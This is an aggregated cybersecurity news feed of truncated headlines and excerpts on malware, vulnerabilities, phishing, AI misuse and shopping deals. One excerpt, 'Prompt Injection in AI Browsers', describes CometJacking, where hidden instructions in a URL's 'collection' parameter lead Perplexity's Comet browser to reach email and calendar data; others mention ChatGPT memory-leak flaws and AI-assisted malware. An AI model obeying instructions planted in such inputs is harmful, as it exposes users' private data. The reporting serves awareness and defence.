Cybersecurity News

RondoDox Exploits Unpatched XWiki Servers to Pull More Devices Into Its Botnet

The botnet malware known as RondoDox has been observed targeting unpatched XWiki instances against a critical security flaw that could allow attackers to achieve arbitrary code execution. The vulnerability in question is CVE-2025-24893 (CVSS score: 9.8), an eval injection bug that could allow any guest user to perform arbitrary remote code execution through a request to the "/bin/get/Main/

Five Plead Guilty in U.S. for Helping North Korean IT Workers Infiltrate 136 Companies

The U.S. Department of Justice (DoJ) on Friday announced that five individuals have pleaded guilty to assisting North Korea's illicit revenue generation schemes by enabling information technology (IT) worker fraud in violation of international sanctions. The five individuals are listed below - Audricus Phagnasay, 24 Jason Salazar, 30 Alexander Paul Travis, 34 Oleksandr Didenko, 28, and Erick

North Korean Hackers Turn JSON Services into Covert Malware Delivery Channels

The North Korean threat actors behind the Contagious Interview campaign have once again tweaked their tactics by using JSON storage services to stage malicious payloads. "The threat actors have recently resorted to utilizing JSON storage services like JSON Keeper, JSONsilo, and npoint.io to host and deliver malware from trojanized code projects, with the lure," NVISO researchers Bart Parys, Stef

Researchers Find Serious AI Bugs Exposing Meta, Nvidia, and Microsoft Inference Frameworks

Cybersecurity researchers have uncovered critical remote code execution vulnerabilities impacting major artificial intelligence (AI) inference engines, including those from Meta, Nvidia, Microsoft, and open-source PyTorch projects such as vLLM and SGLang. "These vulnerabilities all traced back to the same root cause: the overlooked unsafe use of ZeroMQ (ZMQ) and Python's pickle deserialization,"

Iranian Hackers Launch ‘SpearSpecter’ Spy Operation on Defense & Government Targets

The Iranian state-sponsored threat actor known as APT42 has been observed targeting individuals and organizations that are of interest to the Islamic Revolutionary Guard Corps (IRGC) as part of a new espionage-focused campaign. The activity, detected in early September 2025 and assessed to be ongoing, has been codenamed SpearSpecter by the Israel National Digital Agency (INDA). "The

Ransomware's Fragmentation Reaches a Breaking Point While LockBit Returns

Key Takeaways: 85 active ransomware and extortion groups observed in Q3 2025, reflecting the most decentralized ransomware ecosystem to date. 1,590 victims disclosed across 85 leak sites, showing high, sustained activity despite law-enforcement pressure. 14 new ransomware brands launched this quarter, proving how quickly affiliates reconstitute after takedowns. LockBit’s reappearance with

Chinese Hackers Use Anthropic's AI to Launch Automated Cyber Espionage Campaign

State-sponsored threat actors from China used artificial intelligence (AI) technology developed by Anthropic to orchestrate automated cyber attacks as part of a "highly sophisticated espionage campaign" in mid-September 2025. "The attackers used AI's 'agentic' capabilities to an unprecedented degree – using AI not just as an advisor, but to execute the cyber attacks themselves," the AI upstart

Now-Patched Fortinet FortiWeb Flaw Exploited in Attacks to Create Admin Accounts

Cybersecurity researchers are sounding the alert about an authentication bypass vulnerability in Fortinet Fortiweb Web Application Firewall (WAF) that could allow an attacker to take over admin accounts and completely compromise a device. "The watchTowr team is seeing active, indiscriminate in-the-wild exploitation of what appears to be a silently patched vulnerability in Fortinet's FortiWeb

Russian Hackers Create 4,300 Fake Travel Sites to Steal Hotel Guests' Payment Data

A Russian-speaking threat behind an ongoing, mass phishing campaign has registered more than 4,300 domain names since the start of the year. The activity, per Netcraft security researcher Andrew Brandt, is designed to target customers of the hospitality industry, specifically hotel guests who may have travel reservations with spam emails. The campaign is said to have begun in earnest around

Fake Chrome Extension “Safery” Steals Ethereum Wallet Seed Phrases Using Sui Blockchain

Cybersecurity researchers have uncovered a malicious Chrome extension that poses as a legitimate Ethereum wallet but harbors functionality to exfiltrate users' seed phrases. The name of the extension is "Safery: Ethereum Wallet," with the threat actor describing it as a "secure wallet for managing Ethereum cryptocurrency with flexible settings." It was uploaded to the Chrome Web Store on

When Attacks Come Faster Than Patches: Why 2026 Will be the Year of Machine-Speed Security

The Race for Every New CVE Based on multiple 2025 industry reports: roughly 50 to 61 percent of newly disclosed vulnerabilities saw exploit code weaponized within 48 hours. Using the CISA Known Exploited Vulnerabilities Catalog as a reference, hundreds of software flaws are now confirmed as actively targeted within days of public disclosure. Each new announcement now triggers a global race

Operation Endgame Dismantles Rhadamanthys, Venom RAT, and Elysium Botnet in Global Crackdown

Malware families like Rhadamanthys Stealer, Venom RAT, and the Elysium botnet have been disrupted as part of a coordinated law enforcement operation led by Europol and Eurojust. The activity, which is taking place between November 10 and 13, 2025, marks the latest phase of Operation Endgame, an ongoing operation designed to take down criminal infrastructures and combat ransomware enablers

ThreatsDay Bulletin: Cisco 0-Days, AI Bug Bounties, Crypto Heists, State-Linked Leaks and 20 More Stories

Behind every click, there’s a risk waiting to be tested. A simple ad, email, or link can now hide something dangerous. Hackers are getting smarter, using new tools to sneak past filters and turn trusted systems against us. But security teams are fighting back. They’re building faster defenses, better ways to spot attacks, and stronger systems to keep people safe. It’s a constant race — every

CISA Flags Critical WatchGuard Fireware Flaw Exposing 54,000 Fireboxes to No-Login Attacks

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday added a critical security flaw impacting WatchGuard Fireware to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerability in question is CVE-2025-9242 (CVSS score: 9.3), an out-of-bounds write vulnerability affecting Fireware OS 11.10.2 up to and including

Over 67,000 Fake npm Packages Flood Registry in Worm-Like Spam Attack

Cybersecurity researchers are calling attention to a large-scale spam campaign that has flooded the npm registry with thousands of fake packages since early 2024 as part of a likely financially motivated effort. "The packages were systematically published over an extended period, flooding the npm registry with junk packages that survived in the ecosystem for almost two years," Endor Labs

Google Sues China-Based Hackers Behind $1 Billion Lighthouse Phishing Platform

Google has filed a civil lawsuit in the U.S. District Court for the Southern District of New York (SDNY) against China-based hackers who are behind a massive Phishing-as-a-Service (PhaaS) platform called Lighthouse that has ensnared over 1 million users across 120 countries. The PhaaS kit is used to conduct large-scale SMS phishing attacks that exploit trusted brands like E-ZPass and USPS to

Amazon Uncovers Attacks Exploited Cisco ISE and Citrix NetScaler as Zero-Day Flaws

Amazon's threat intelligence team on Wednesday disclosed that it observed an advanced threat actor exploiting two then-zero-day security flaws in Cisco Identity Service Engine (ISE) and Citrix NetScaler ADC products as part of attacks designed to deliver custom malware. "This discovery highlights the trend of threat actors focusing on critical identity and network access control infrastructure –

[Webinar] Learn How Leading Security Teams Reduce Attack Surface Exposure with DASR

Every day, security teams face the same problem—too many risks, too many alerts, and not enough time. You fix one issue, and three more show up. It feels like you’re always one step behind. But what if there was a smarter way to stay ahead—without adding more work or stress? Join The Hacker News and Bitdefender for a free cybersecurity webinar to learn about a new approach called Dynamic Attack

Active Directory Under Siege: Why Critical Infrastructure Needs Stronger Security

Active Directory remains the authentication backbone for over 90% of Fortune 1000 companies. AD's importance has grown as companies adopt hybrid and cloud infrastructure, but so has its complexity. Every application, user, and device traces back to AD for authentication and authorization, making it the ultimate target. For attackers, it represents the holy grail: compromise Active

Microsoft Fixes 63 Security Flaws, Including a Windows Kernel Zero-Day Under Active Attack

Microsoft on Tuesday released patches for 63 new security vulnerabilities identified in its software, including one that has come under active exploitation in the wild. Of the 63 flaws, four are rated Critical and 59 are rated Important in severity. Twenty-nine of these vulnerabilities are related to privilege escalation, followed by 16 remote code execution, 11 information disclosure, three

Google Launches 'Private AI Compute' — Secure AI Processing with On-Device-Level Privacy

Google on Tuesday unveiled a new privacy-enhancing technology called Private AI Compute to process artificial intelligence (AI) queries in a secure platform in the cloud. The company said it has built Private AI Compute to "unlock the full speed and power of Gemini cloud models for AI experiences, while ensuring your personal data stays private to you and is not accessible to anyone else, not

WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks

Threat hunters have uncovered similarities between a banking malware called Coyote and a newly disclosed malicious program dubbed Maverick that has been propagated via WhatsApp. According to a report from CyberProof, both malware strains are written in .NET, target Brazilian users and banks, and feature identical functionality to decrypt, targeting banking URLs and monitor banking applications.

GootLoader Is Back, Using a New Font Trick to Hide Malware on WordPress Sites

The malware known as GootLoader has resurfaced yet again after a brief spike in activity earlier this March, according to new findings from Huntress. The cybersecurity company said it observed three GootLoader infections since October 27, 2025, out of which two resulted in hands-on keyboard intrusions with domain controller compromise taking place within 17 hours of initial infection. "

CISO's Expert Guide To AI Supply Chain Attacks

AI-enabled supply chain attacks jumped 156% last year. Discover why traditional defenses are failing and what CISOs must do now to protect their organizations. Download the full CISO’s expert guide to AI Supply chain attacks here.  TL;DR AI-enabled supply chain attacks are exploding in scale and sophistication - Malicious package uploads to open-source repositories jumped 156% in

Npm Package Targeting GitHub-Owned Repositories Flagged as Red Team Exercise

Cybersecurity researchers have discovered a malicious npm package named "@acitons/artifact" that typosquats the legitimate "@actions/artifact" package with the intent to target GitHub-owned repositories. "We think the intent was to have this script execute during a build of a GitHub-owned repository, exfiltrate the tokens available to the build environment, and then use those tokens to publish

Android Trojan 'Fantasy Hub' Malware Service Turns Telegram Into a Hub for Hackers

Cybersecurity researchers have disclosed details of a new Android remote access trojan (RAT) called Fantasy Hub that's sold on Russian-speaking Telegram channels under a Malware-as-a-Service (MaaS) model. According to its seller, the malware enables device control and espionage, allowing threat actors to collect SMS messages, contacts, call logs, images, and videos, as well as intercept, reply,

Hackers Exploiting Triofox Flaw to Install Remote Access Tools via Antivirus Feature

Google's Mandiant Threat Defense on Monday said it discovered n-day exploitation of a now-patched security flaw in Gladinet's Triofox file-sharing and remote access platform. The critical vulnerability, tracked as CVE-2025-12480 (CVSS score: 9.1), allows an attacker to bypass authentication and access the configuration pages, resulting in the upload and execution of arbitrary payloads.  The

Konni Hackers Turn Google’s Find Hub into a Remote Data-Wiping Weapon

The North Korea-affiliated threat actor known as Konni (aka Earth Imp, Opal Sleet, Osmium, TA406, and Vedalia) has been attributed to a new set of attacks targeting both Android and Windows devices for data theft and remote control. "Attackers impersonated psychological counselors and North Korean human rights activists, distributing malware disguised as stress-relief programs," the Genians

⚡ Weekly Recap: Hyper-V Malware, Malicious AI Bots, RDP Exploits, WhatsApp Lockdown and More

Cyber threats didn’t slow down last week—and attackers are getting smarter. We’re seeing malware hidden in virtual machines, side-channel leaks exposing AI chats, and spyware quietly targeting Android devices in the wild. But that’s just the surface. From sleeper logic bombs to a fresh alliance between major threat groups, this week’s roundup highlights a clear shift: cybercrime is evolving fast

New Browser Security Report Reveals Emerging Threats for Enterprises

According to the new Browser Security Report 2025, security leaders are discovering that most identity, SaaS, and AI-related risks converge in a single place, the user’s browser. Yet traditional controls like DLP, EDR, and SSE still operate one layer too low. What’s emerging isn’t just a blindspot. It’s a parallel threat surface: unmanaged extensions acting like supply chain implants, GenAI

Large-Scale ClickFix Phishing Attacks Target Hotel Systems with PureRAT Malware

Cybersecurity researchers have called attention to a massive phishing campaign targeting the hospitality industry that lures hotel managers to ClickFix-style pages and harvest their credentials by deploying malware like PureRAT. "The attacker's modus operandi involved using a compromised email account to send malicious messages to multiple hotel establishments," Sekoia said. "This campaign

GlassWorm Malware Discovered in Three VS Code Extensions with Thousands of Installs

Cybersecurity researchers have disclosed a new set of three extensions associated with the GlassWorm campaign, indicating continued attempts on part of threat actors to target the Visual Studio Code (VS Code) ecosystem. The extensions in question, which are still available for download, are listed below - ai-driven-dev.ai-driven-dev (3,402 downloads) adhamu.history-in-sublime-merge (4,057

Microsoft Uncovers 'Whisper Leak' Attack That Identifies AI Chat Topics in Encrypted Traffic

Microsoft has disclosed details of a novel side-channel attack targeting remote language models that could enable a passive adversary with capabilities to observe network traffic to glean details about model conversation topics despite encryption protections under certain circumstances. This leakage of data exchanged between humans and streaming-mode language models could pose serious risks to

Samsung Mobile Flaw Exploited as Zero-Day to Deploy LANDFALL Android Spyware

A now-patched security flaw in Samsung Galaxy Android devices was exploited as a zero-day to deliver a "commercial-grade" Android spyware dubbed LANDFALL in targeted attacks in the Middle East. The activity involved the exploitation of CVE-2025-21042 (CVSS score: 8.8), an out-of-bounds write flaw in the "libimagecodec.quram.so" component that could allow remote attackers to execute arbitrary

From Log4j to IIS, China’s Hackers Turn Legacy Bugs into Global Espionage Tools

A China-linked threat actor has been attributed to a cyber attack targeting an U.S. non-profit organization with an aim to establish long-term persistence, as part of broader activity aimed at U.S. entities that are linked to or involved in policy issues. The organization, according to a report from Broadcom's Symantec and Carbon Black teams, is "active in attempting to influence U.S. government

Hidden Logic Bombs in Malware-Laced NuGet Packages Set to Detonate Years After Installation

A set of nine malicious NuGet packages has been identified as capable of dropping time-delayed payloads to sabotage database operations and corrupt industrial control systems. According to software supply chain security company Socket, the packages were published in 2023 and 2024 by a user named "shanhai666" and are designed to run malicious code after specific trigger dates in August 2027 and

Enterprise Credentials at Risk – Same Old, Same Old?

Imagine this: Sarah from accounting gets what looks like a routine password reset email from your organization’s cloud provider. She clicks the link, types in her credentials, and goes back to her spreadsheet. But unknown to her, she’s just made a big mistake. Sarah just accidentally handed over her login details to cybercriminals who are laughing all the way to their dark web

Google Launches New Maps Feature to Help Businesses Report Review-Based Extortion Attempts

Google on Thursday said it's rolling out a dedicated form to allow businesses listed on Google Maps to report extortion attempts made by threat actors who post inauthentic bad reviews on the platform and demand ransoms to remove the negative comments. The approach is designed to tackle a common practice called review bombing, where online users intentionally post negative user reviews in an

Vibe-Coded Malicious VS Code Extension Found with Built-In Ransomware Capabilities

Cybersecurity researchers have flagged a malicious Visual Studio Code (VS Code) extension with basic ransomware capabilities that appears to be created with the help of artificial intelligence – in other words, vibe-coded. Secure Annex researcher John Tuckner, who flagged the extension "susvsex," said it does not attempt to hide its malicious functionality. The extension was uploaded on

Trojanized ESET Installers Drop Kalambur Backdoor in Phishing Attacks on Ukraine

A previously unknown threat activity cluster has been observed impersonating Slovak cybersecurity company ESET as part of phishing attacks targeting Ukrainian entities. The campaign, detected in May 2025, is tracked by the security outfit under the moniker InedibleOchotense, describing it as Russia-aligned. "InedibleOchotense sent spear-phishing emails and Signal text messages, containing a link

Cisco Warns of New Firewall Attack Exploiting CVE-2025-20333 and CVE-2025-20362

Cisco on Wednesday disclosed that it became aware of a new attack variant that's designed to target devices running Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software releases that are susceptible to CVE-2025-20333 and CVE-2025-20362. "This attack can cause unpatched devices to unexpectedly reload, leading to denial-of-service

From Tabletop to Turnkey: Building Cyber Resilience in Financial Services

Introduction Financial institutions are facing a new reality: cyber-resilience has passed from being a best practice, to an operational necessity, to a prescriptive regulatory requirement. Crisis management or Tabletop exercises, for a long time relatively rare in the context of cybersecurity, have become required as a series of regulations has introduced this requirement to FSI organizations in

ThreatsDay Bulletin: AI Tools in Malware, Botnets, GDI Flaws, Election Attacks & More

Cybercrime has stopped being a problem of just the internet — it’s becoming a problem of the real world. Online scams now fund organized crime, hackers rent violence like a service, and even trusted apps or social platforms are turning into attack vectors. The result is a global system where every digital weakness can be turned into physical harm, economic loss, or political leverage.

Bitdefender Named a Representative Vendor in the 2025 Gartner® Market Guide for Managed Detection and Response

Bitdefender has once again been recognized as a Representative Vendor in the Gartner® Market Guide for Managed Detection and Response (MDR) — marking the fourth consecutive year of inclusion. According to Gartner, more than 600 providers globally claim to deliver MDR services, yet only a select few meet the criteria to appear in the Market Guide. While inclusion is not a ranking or comparative

Hackers Weaponize Windows Hyper-V to Hide Linux VM and Evade EDR Detection

The threat actor known as Curly COMrades has been observed exploiting virtualization technologies as a way to bypass security solutions and execute custom malware. According to a new report from Bitdefender, the adversary is said to have enabled the Hyper-V role on selected victim systems to deploy a minimalistic, Alpine Linux-based virtual machine. "This hidden environment, with its lightweight

SonicWall Confirms State-Sponsored Hackers Behind September Cloud Backup Breach

SonicWall has formally implicated state-sponsored threat actors as behind the September security breach that led to the unauthorized exposure of firewall configuration backup files. "The malicious activity – carried out by a state-sponsored threat actor – was isolated to the unauthorized access of cloud backup files from a specific cloud environment using an API call," the company said in a

Google Uncovers PROMPTFLUX Malware That Uses Gemini AI to Rewrite Its Code Hourly

Google on Wednesday said it discovered an unknown threat actor using an experimental Visual Basic Script (VB Script) malware dubbed PROMPTFLUX that interacts with its Gemini artificial intelligence (AI) model API to write its own source code for improved obfuscation and evasion. "PROMPTFLUX is written in VB Script and interacts with Gemini's API to request specific VBScript obfuscation and

Researchers Find ChatGPT Vulnerabilities That Let Attackers Trick AI Into Leaking Data

Cybersecurity researchers have disclosed a new set of vulnerabilities impacting OpenAI's ChatGPT artificial intelligence (AI) chatbot that could be exploited by an attacker to steal personal information from users' memories and chat histories without their knowledge. The seven vulnerabilities and attack techniques, according to Tenable, were found in OpenAI's GPT-4o and GPT-5 models. OpenAI has

Securing the Open Android Ecosystem with Samsung Knox

Raise your hand if you’ve heard the myth, “Android isn’t secure.” Android phones, such as the Samsung Galaxy, unlock new ways of working. But, as an IT admin, you may worry about the security—after all, work data is critical. However, outdated concerns can hold your business back from unlocking its full potential. The truth is, with work happening everywhere, every device connected to your

Mysterious 'SmudgedSerpent' Hackers Target U.S. Policy Experts Amid Iran–Israel Tensions

A never-before-seen threat activity cluster codenamed UNK_SmudgedSerpent has been attributed as behind a set of cyber attacks targeting academics and foreign policy experts between June and August 2025, coinciding with heightened geopolitical tensions between Iran and Israel. "UNK_SmudgedSerpent leveraged domestic political lures, including societal change in Iran and investigation into the

Google Sues to Disrupt Chinese SMS Phishing Triad

Google is suing more than two dozen unnamed individuals allegedly involved in peddling a popular China-based mobile phishing service that helps scammers impersonate hundreds of trusted brands, blast out text message lures, and convert phished payment card data into mobile wallets from Apple and Google.

Drilling Down on Uncle Sam’s Proposed TP-Link Ban

The U.S. government is reportedly preparing to ban the sale of wireless routers and other networking gear from TP-Link Systems, a tech company that currently enjoys an estimated 50% market share among home users and small businesses. Experts say while the proposed ban may have more to do with TP-Link's ties to China than any specific technical threats, much of the rest of the industry serving this market also sources hardware from China and ships products that are insecure fresh out of the box.

Cloudflare Scrubs Aisuru Botnet from Top Domains List

For the past week, domains associated with the massive Aisuru botnet have repeatedly usurped Amazon, Apple, Google and Microsoft in Cloudflare's public ranking of the most frequently requested websites. Cloudflare responded by redacting Aisuru domain names from their top websites list. The chief executive at Cloudflare says Aisuru's overlords are using the botnet to boost their malicious domain rankings, while simultaneously attacking the company's domain name system (DNS) service.

Alleged Jabber Zeus Coder ‘MrICQ’ in U.S. Custody

A Ukrainian man indicted in 2012 for conspiring with a prolific hacking group to steal tens of millions of dollars from U.S. businesses was arrested in Italy and is now in custody in the United States, KrebsOnSecurity has learned. Sources close to the investigation say Yuriy Igorevich Rybtsov, a 41-year-old from the Russia-controlled city of Donetsk, Ukraine, was previously referenced in U.S. federal charging documents only by his online handle "MrICQ." According to a 13-year-old indictment filed by prosecutors in Nebraska, MrICQ was a developer for a cybercrime group known as "Jabber Zeus."

Aisuru Botnet Shifts from DDoS to Residential Proxies

Aisuru, the botnet responsible for a series of record-smashing distributed denial-of-service (DDoS) attacks this year, recently was overhauled to support a more low-key, lucrative and sustainable business: Renting hundreds of thousands of infected Internet of Things (IoT) devices to proxy services that help cybercriminals anonymize their traffic. Experts says a glut of proxies from Aisuru and other sources is fueling large-scale data harvesting efforts tied to various artificial intelligence (AI) projects, helping content scrapers evade detection by routing their traffic through residential connections that appear to be regular Internet users.

Canada Fines Cybercrime Friendly Cryptomus $176M

Financial regulators in Canada this week levied $176 million in fines against Cryptomus, a digital payments platform that supports dozens of Russian cryptocurrency exchanges and websites hawking cybercrime services. The penalties for violating Canada's anti money-laundering laws come ten months after KrebsOnSecurity noted that Cryptomus's Vancouver street address was home to dozens of foreign currency dealers, money transfer businesses, and cryptocurrency exchanges — none of which were physically located there.

Email Bombs Exploit Lax Authentication in Zendesk

Cybercriminals are abusing a widespread lack of authentication in the customer service platform Zendesk to flood targeted email inboxes with menacing messages that come from hundreds of Zendesk corporate customers simultaneously.

Patch Tuesday, October 2025 ‘End of 10’ Edition

Microsoft today released software updates to plug a whopping 172 security holes in its Windows operating systems, including at least three vulnerabilities that are already being actively exploited. October's Patch Tuesday also marks the final month that Microsoft will ship security updates for Windows 10 systems. If you're running a Windows 10 PC and you're unable or unwilling to migrate to Windows 11, read on for other options.

DDoS Botnet Aisuru Blankets US ISPs in Record DDoS

The world's largest and most disruptive botnet is now drawing a majority of its firepower from compromised Internet-of-Things (IoT) devices hosted on U.S. Internet providers like AT&T, Comcast and Verizon, new evidence suggests. Experts say the heavy concentration of infected devices at U.S. providers is complicating efforts to limit collateral damage from the botnet's attacks, which shattered previous records this week with a brief traffic flood that clocked in at nearly 30 trillion bits of data per second.

ShinyHunters Wage Broad Corporate Extortion Spree

A cybercriminal group that used voice phishing attacks to siphon more than a billion records from Salesforce customers earlier this year has launched a website that threatens to publish data stolen from dozens of Fortune 500 firms if they refuse to pay a ransom. The group also claimed responsibility for a recent breach involving Discord user data, and for stealing terabytes of sensitive files from thousands of customers of the enterprise software maker Red Hat.

Friday Squid Blogging: Pilot Whales Eat a Lot of Squid

Short-finned pilot wales (Globicephala macrorhynchus) eat at lot of squid:

To figure out a short-finned pilot whale’s caloric intake, Gough says, the team had to combine data from a variety of sources, including movement data from short-lasting tags, daily feeding rates from satellite tags, body measurements collected via aerial drones, and sifting through the stomachs of unfortunate whales that ended up stranded on land.

Once the team pulled all this data together, they estimated that a typical whale will eat between 82 and 202 squid a day. To meet their energy needs, a whale will have to consume an average of 140 squid a day. Annually, that’s about 74,000 squid per whale. For all the whales in the area, that amounts to about 88,000 tons of squid eaten every year...

Upcoming Speaking Engagements

This is a current list of where and when I am scheduled to speak:

• My coauthor Nathan E. Sanders and I are speaking at the Rayburn House Office Building in Washington, DC at noon ET on November 17, 2025. The event is hosted by the POPVOX Foundation and the topic is “AI and Congress: Practical Steps to Govern and Prepare.”
• I’m speaking on “Integrity and Trustworthy AI” at North Hennepin Community College in Brooklyn Park, Minnesota, USA, on Friday, November 21, 2025, at 2:00 PM CT. The event is cohosted by the college and The Twin Cities IEEE Computer Society...

The Role of Humans in an AI-Powered World

As AI capabilities grow, we must delineate the roles that should remain exclusively human. The line seems to be between fact-based decisions and judgment-based decisions.

For example, in a medical context, if an AI was demonstrably better at reading a test result and diagnosing cancer than a human, you would take the AI in a second. You want the more accurate tool. But justice is harder because justice is inherently a human quality in a way that “Is this tumor cancerous?” is not. That’s a fact-based question. “What’s the right thing to do here?” is a human-based question...

Book Review: The Business of Secrets

The Business of Secrets: Adventures in Selling Encryption Around the World by Fred Kinch (May 24, 2024)

From the vantage point of today, it’s surreal reading about the commercial cryptography business in the 1970s. Nobody knew anything. The manufacturers didn’t know whether the cryptography they sold was any good. The customers didn’t know whether the crypto they bought was any good. Everyone pretended to know, thought they knew, or knew better than to even try to know.

The Business of Secrets is the self-published memoirs of Fred Kinch. He was founder and vice president of—mostly sales—at a US cryptographic hardware company called Datotek, from company’s founding in 1969 until 1982. It’s mostly a disjointed collection of stories about the difficulties of selling to governments worldwide, along with descriptions of the highs and (mostly) lows of foreign airlines, foreign hotels, and foreign travel in general. But it’s also about encryption...

On Hacking Back

Former DoJ attorney John Carlin writes about hackback, which he defines thus: “A hack back is a type of cyber response that incorporates a counterattack designed to proactively engage with, disable, or collect evidence about an attacker. Although hack backs can take on various forms, they are—­by definition­—not passive defensive measures.”

His conclusion:

As the law currently stands, specific forms of purely defense measures are authorized so long as they affect only the victim’s system or data.

At the other end of the spectrum, offensive measures that involve accessing or otherwise causing damage or loss to the hacker’s systems are likely prohibited, absent government oversight or authorization. And even then parties should proceed with caution in light of the heightened risks of misattribution, collateral damage, and retaliation...

Prompt Injection in AI Browsers

This is why AIs are not ready to be personal assistants:

A new attack called ‘CometJacking’ exploits URL parameters to pass to Perplexity’s Comet AI browser hidden instructions that allow access to sensitive data from connected services, like email and calendar.

In a realistic scenario, no credentials or user interaction are required and a threat actor can leverage the attack by simply exposing a maliciously crafted URL to targeted users.

[…]

CometJacking is a prompt-injection attack where the query string processed by the Comet AI browser contains malicious instructions added using the ‘collection’ parameter of the URL...

New Attacks Against Secure Enclaves

Encryption can protect data at rest and data in transit, but does nothing for data in use. What we have are secure enclaves. I’ve written about this before:

Almost all cloud services have to perform some computation on our data. Even the simplest storage provider has code to copy bytes from an internal storage system and deliver them to the user. End-to-end encryption is sufficient in such a narrow context. But often we want our cloud providers to be able to perform computation on our raw data: search, analysis, AI model training or fine-tuning, and more. Without expensive, esoteric techniques, such as secure multiparty computation protocols or homomorphic encryption techniques that can perform calculations on encrypted data, cloud servers require access to the unencrypted data to do anything useful...

Friday Squid Blogging: Squid Game: The Challenge, Season Two

The second season of the Netflix reality competition show Squid Game: The Challenge has dropped. (Too many links to pick a few—search for it.)

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Blog moderation policy.

Faking Receipts with AI

Over the past few decades, it’s become easier and easier to create fake receipts. Decades ago, it required special paper and printers—I remember a company in the UK advertising its services to people trying to cover up their affairs. Then, receipts became computerized, and faking them required some artistic skills to make the page look realistic.

Now, AI can do it all:

Several receipts shown to the FT by expense management platforms demonstrated the realistic nature of the images, which included wrinkles in paper, detailed itemization that matched real-life menus, and signatures...

Rigged Poker Games

The Department of Justice has indicted thirty-one people over the high-tech rigging of high-stakes poker games.

In a typical legitimate poker game, a dealer uses a shuffling machine to shuffle the cards randomly before dealing them to all the players in a particular order. As set forth in the indictment, the rigged games used altered shuffling machines that contained hidden technology allowing the machines to read all the cards in the deck. Because the cards were always dealt in a particular order to the players at the table, the machines could determine which player would have the winning hand. This information was transmitted to an off-site member of the conspiracy, who then transmitted that information via cellphone back to a member of the conspiracy who was playing at the table, referred to as the “Quarterback” or “Driver.” The Quarterback then secretly signaled this information (usually by prearranged signals like touching certain chips or other items on the table) to other co-conspirators playing at the table, who were also participants in the scheme. Collectively, the Quarterback and other players in on the scheme (i.e., the cheating team) used this information to win poker games against unwitting victims, who sometimes lost tens or hundreds of thousands of dollars at a time. The defendants used other cheating technology as well, such as a chip tray analyzer (essentially, a poker chip tray that also secretly read all cards using hidden cameras), an x-ray table that could read cards face down on the table, and special contact lenses or eyeglasses that could read pre-marked cards. ...

Dig the analog watch look? I found a hybrid smartwatch that combines the best of both worlds

Withings' latest ScanWatch 2 embeds the company's health-tracking technology into a high-end, hybrid wearable.

Walmart will sell you this $89 LG UltraGear monitor for a limited time - but it won't last

This LG UltraGear display outputs lifelike visuals thanks to its 1080 resolution panel, 144Hz refresh rate, and HDR10 support.

Samsung fans won't like this: OnePlus just topped the S25 Ultra in more ways than one

I traveled with both Android flagships for a week. Here's how the OnePlus 15 still stands out.

I'm struggling to justify the AirPods Pro 3 when this model just set a record-low price

Despite the release of a new pair of AirPods, the Pro 2 remain a suitable option for many users. Get them now at their lowest price ever.

OnePlus 15 vs. Samsung Galaxy S25 Ultra: I've used both Android flagships, and here's who wins

Which phone deserves your hard-earned money this holiday season? Here's how to decide.

Walmart's Black Friday sale is officially here: I'm tracking my favorite discounts up to 60% off live

It's day two of Walmart's early Black Friday sale, with big discounts on AirPods, TVs, laptops, and more (don't miss your chance to save over $1,300 on a big-screen Samsung TV).

Best Buy just cut prices on dozens of Black Friday deals - I've hand-picked early discounts live now up to $800 off

Best Buy's holiday savings kicked off early in 2025, with savings on TVs, headphones, speakers, and more. These are my favorite deals available now, including the Dyson V11 vacuum for over $200 off.

Best Buy just cut the prices for dozens of Black Friday deals - I hand-picked 20+ early discounts live now

From TVs to earbuds, Best Buy's holiday savings kicked off early in 2025. These are my favorite deals available now, like four AirTags for only $80.

Google Brain founder Andrew Ng thinks you should still learn to code - here's why

ZDNET sat down with Andrew Ng at AI Dev 25 in New York to talk about developer futures, responsible AI, and why AGI is overhyped.

Withings' FDA-cleared smart thermometer does more than take your temp - what's new

The smart thermometer checks your temperature, as well as your cardiac and pulmonary health, in under a minute.

A week with this Oura Ring competitor killed my excitement - here's how things went

The Circular Ring 2 undercuts the Oura with a lower price and no subscription fees, but it achieves this by taking some questionable shortcuts.

I'm tired of the cheap Android tablet slander - this $200 one checks all the boxes for me

The Tabwee T60 Pro is a solid bang-for-buck tablet for Android users.

Don't be sad if your Amazon driver shows up with smart glasses on - they're actually helpful

Faster and safer deliveries are on the way.

A year later, here's why I keep coming back to the Surface Laptop (especially at this price)

Microsoft's Surface Laptop impresses with a sleek form factor and marathon battery. Right now, both the 13-inch and 15-inch are on sale for Black Friday.

5 ways to use your Chromecast TV beyond streaming shows (including a smart home hack)

Google's long-running streaming device is still useful for far more than binge-watching.

Are Black Friday TV deals actually worth it? They can be, if you know where to look

Are Black Friday TV deals legit? With a strict budget and a sharp eye, you can find decent discounts at retailers like Amazon, Best Buy, and more.

Apple, Microsoft, or Google: Whose platform authenticator rules our passkey future?

As we navigate the bumpy road from passwords to passkeys, the authenticator already in your system could define our passwordless future.

This smartwatch can monitor your blood pressure, but it's not for everyone - here's why

Wrist-based blood pressure monitoring is a developing technology, but the YHE BP Doctor Med is a product that could help some people.

Why this year-old Android smartwatch is still a prime option for most people (and it looks great)

The OnePlus Watch 2R is a trimmed-down version of the flagship, but still has some impressive specs.

Meta's Quest 3S is already a great value, and this new price drop makes it unbeatable

The Meta Quest 3S is a midrange VR headset with significant upgrades over the Quest 2, including improved hardware and features. It's currently on sale ahead of Black Friday.

Fortinet Confirms Active Exploitation of Critical FortiWeb Vulnerability

Security firms say the flaw has been actively exploited for weeks, even as Fortinet quietly shipped fixes and CISA added the bug to its KEV catalog.

The post Fortinet Confirms Active Exploitation of Critical FortiWeb Vulnerability appeared first on SecurityWeek.

CYBERCOM 2.0: Pentagon Unveils Plan to Fix Cyber Talent Shortfalls

The goal is to produce a cyber force capable of defeating threats posed by major adversaries such as China.

The post CYBERCOM 2.0: Pentagon Unveils Plan to Fix Cyber Talent Shortfalls appeared first on SecurityWeek.

Watch on Demand: CISO Forum 2025 Virtual Summit

The CISO Forum Virtual Summit brought together CISOs, researchers, and innovators to share practical insights and strategies.

The post Watch on Demand: CISO Forum 2025 Virtual Summit appeared first on SecurityWeek.

